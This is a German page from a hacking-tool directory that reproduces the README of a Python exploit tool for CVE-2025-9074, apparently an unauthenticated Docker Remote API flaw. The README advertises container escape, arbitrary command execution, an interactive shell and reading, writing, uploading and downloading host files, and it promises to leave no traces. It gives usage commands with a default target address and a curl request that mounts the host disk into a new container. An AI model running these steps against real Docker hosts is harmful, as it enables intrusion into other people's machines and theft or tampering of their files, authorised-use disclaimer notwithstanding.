Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-9074-Docker-Exploit — Ein leistungsstarkes Docker-Remote-API-Schwachstellen-Exploit-Tool für Sicherheitsforschung und Tests der Schwachstelle CVE-2025-9074. | Kitploit
Tools/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Container-SicherheitSchwachstellenanalyseExploitationPenetrationstestsCloud-SicherheitRed TeamingContainer-Ausbruch
GitHubshaoshi17/cve-2025-9074-docker-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-9074-Docker-Exploit

Ein leistungsstarkes Docker-Remote-API-Schwachstellen-Exploit-Tool für Sicherheitsforschung und Tests der Schwachstelle CVE-2025-9074.

Repository anzeigen
1218vor 9 MonatenNoch nicht geprüft

CVE-2025-9074 Docker-Container-Befehlsausführungstool

Ein leistungsstarkes Tool zur Ausnutzung der Docker Remote API für die Sicherheitsforschung und das Testen der Schwachstelle CVE-2025-9074.

Hauptvorteile

✅ Vollautomatisches Container-Lebenszyklus-Management: Automatische Erstellung temporärer Container, automatische Bereinigung nach Abschluss des Vorgangs, keine Spuren hinterlassen
✅ Intelligente Pfadverarbeitung: Automatische Erkennung und Konvertierung von Windows-Pfaden in das Docker-Mount-Format
✅ Vollständig automatisierter Arbeitsablauf: Keine manuelle Eingabe komplexer Befehle erforderlich, menügesteuerte Interaktion, Dateivorgänge mit einem Klick
✅ Plattformübergreifend: Perfekte Unterstützung für Windows- und Linux-Systeme

Screenshot einiger Funktionen

image

Funktionsmerkmale

  • Container-Operationen

    • Laufende Container anzeigen
    • Alle Container anzeigen (einschließlich gestoppter)
    • Neuen Container erstellen
    • Container stoppen
    • Container löschen
    • Einmalige Befehlsausführung
    • Interaktives Terminal (erfordert docker-Bibliothek)
  • Image-Verwaltung

    • Lokale Images anzeigen
    • Neues Image pullen
    • Image löschen
  • Dateioperationen auf dem Host

    • Datei auf den Host hochladen
    • Datei vom Host herunterladen
    • Inhalt einer Datei auf dem Host lesen
    • Datei auf dem Host schreiben
    • Automatische Verarbeitung der Windows Docker Desktop-Pfadzuordnung

Schwachstellenbeschreibung

CVE-2025-9074 ist eine Sicherheitslücke in der Docker Remote API. Ein Angreifer kann durch nicht autorisierten Zugriff auf die Docker API Folgendes tun:

  • Beliebige Befehle ausführen
  • Container erstellen und Host-Festplatten einbinden
  • Container-Ausbruch erreichen
  • Host-Dateien lesen/schreiben

Systemvoraussetzungen

  • Python 3.6+

Abhängigkeiten installieren

Installieren Sie alle Abhängigkeiten mit der requirements.txt:

pip install -r requirements.txt

Oder manuelle Installation:

pip install requests docker websocket-client

Verwendung

Grundlegende Verwendung

Führen Sie das Skript direkt mit der Standard-Docker-API-Adresse aus:

python CVE-2025-9074-docker-exploit.py

Benutzerdefinierte Docker-API-Adresse

python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Befehlszeilenargumente

python CVE-2025-9074-docker-exploit.py [Optionen]

Optionen:
  -u, --url URL         Docker-API-Adresse (Standard: http://192.168.65.7:2375)

Detaillierte Funktionsbeschreibung

Container-Operationen

  1. Laufende Container anzeigen: Zeigt eine Liste aller laufenden Container an
  2. Alle Container anzeigen: Zeigt alle Container an (einschließlich gestoppter)
  3. Neuen Container erstellen: Erstellt einen neuen Container mit einem bestimmten Image
  4. Container stoppen: Stoppt einen laufenden Container
  5. Container löschen: Löscht einen Container (ggf. mit Zwang)
  6. Einmalige Befehlsausführung: Führt einen einzelnen Befehl im Container aus
  7. Interaktives Terminal: Öffnet eine interaktive Shell im Container (erfordert docker-Bibliothek)

Interaktives Terminal verwenden

  1. Nach dem Start des Skripts wählen Sie „1. Container-Operationen"
  2. Wählen Sie „1. Laufende Container anzeigen"
  3. Geben Sie die Containernummer ein, um einen Container auszuwählen
  4. Wählen Sie „2. Interaktives Terminal (erfordert docker-Bibliothek)"
  5. Geben Sie den Shell-Befehl ein (Standard: /bin/sh)
  6. Beginnen Sie mit der interaktiven Bedienung

Image-Verwaltung

  1. Images anzeigen: Listet alle lokalen Images auf
  2. Image pullen: Pullen ein neues Image von Docker Hub
  3. Image löschen: Löscht ein lokales Image

Dateioperationen auf dem Host

Datei auf den Host hochladen

1. Datei auf den Host hochladen
Bitte geben Sie den lokalen Dateipfad ein: /path/to/local/file.txt
Bitte geben Sie das Zielverzeichnis auf dem Host ein: D:/temp
Bitte geben Sie den Ziel-Dateinamen ein (leer lassen für Originalnamen):

Datei vom Host herunterladen

2. Datei vom Host herunterladen
Bitte geben Sie den Dateipfad auf dem Host ein: D:/temp/file.txt
Bitte geben Sie den lokalen Speicherpfad ein: /tmp

Inhalt einer Datei auf dem Host lesen

3. Inhalt einer Datei auf dem Host lesen
Bitte geben Sie den Dateipfad auf dem Host ein: D:/temp/file.txt

Datei auf dem Host schreiben

4. Datei auf dem Host schreiben
Bitte geben Sie das Zielverzeichnis auf dem Host ein: D:/temp
Bitte geben Sie den Dateiinhalt ein: Hello, World!

Windows Docker Desktop-Pfadzuordnung

Dieses Tool verarbeitet automatisch die Pfadzuordnung von Windows Docker Desktop:

Windows-PfadDocker-Mount-Pfad
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test

Unterstützte Eingabeformate:

  • D:\ oder D:/
  • D:\temp oder D:/temp
  • "D:\file.txt" (mit Anführungszeichen)
  • 'D:/file.txt' (mit Anführungszeichen)

Sicherheitshinweise

⚠️ Wichtiger Hinweis:

  1. Nur für autorisierte Tests: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt
  2. Rechtliche Konformität: Stellen Sie vor der Verwendung sicher, dass Sie die ausdrückliche Genehmigung des Zielsystems haben
  3. Isolierte Umgebung: Es wird empfohlen, das Tool in einer isolierten Testumgebung zu verwenden
  4. Berechtigungen: Windows Docker Desktop benötigt Administratorrechte, um auf das Laufwerk C: schreiben zu können
  5. Kein Missbrauch: Die unbefugte Nutzung dieses Tools kann gegen Gesetze und Vorschriften verstoßen

Technisches Prinzip

Container-Ausbruch

Erstellen eines Containers über die Docker API und Einbinden der Host-Festplatte:

curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Dateien lesen/schreiben

Lesen und Schreiben von Host-Dateien durch Ausführen von Befehlen im Container:

# Datei schreiben
echo "content" > /tmp/file.txt

# Datei lesen
cat /tmp/file.txt

Fehlerbehebung

Container-Erstellung fehlgeschlagen (Fehler 500)

  • Überprüfen Sie, ob die Docker-API erreichbar ist
  • Stellen Sie sicher, dass das Pfadformat korrekt ist
  • Überprüfen Sie, ob das Image vorhanden ist

Dateischreiben fehlgeschlagen

  • Windows Docker Desktop muss mit Administratorrechten ausgeführt werden
  • Überprüfen Sie die Berechtigungen des Zielverzeichnisses

Interaktives Terminal startet nicht

  • Stellen Sie sicher, dass die docker-Bibliothek installiert ist: pip install docker websocket-client
  • Überprüfen Sie, ob das Terminal den interaktiven Modus unterstützt

Entwicklung und Test

Tests ausführen

python CVE-2025-9074-docker-exploit.py

Codestruktur

CVE-2025-9074-docker-exploit.py
├── Container-Verwaltungsfunktionen
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── Image-Verwaltungsfunktionen
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── Host-Dateioperationsfunktionen
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── Hilfsfunktionen
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Mitwirken

Issue- und Pull-Request-Einreichungen sind willkommen!

Lizenz

Tool herunterladen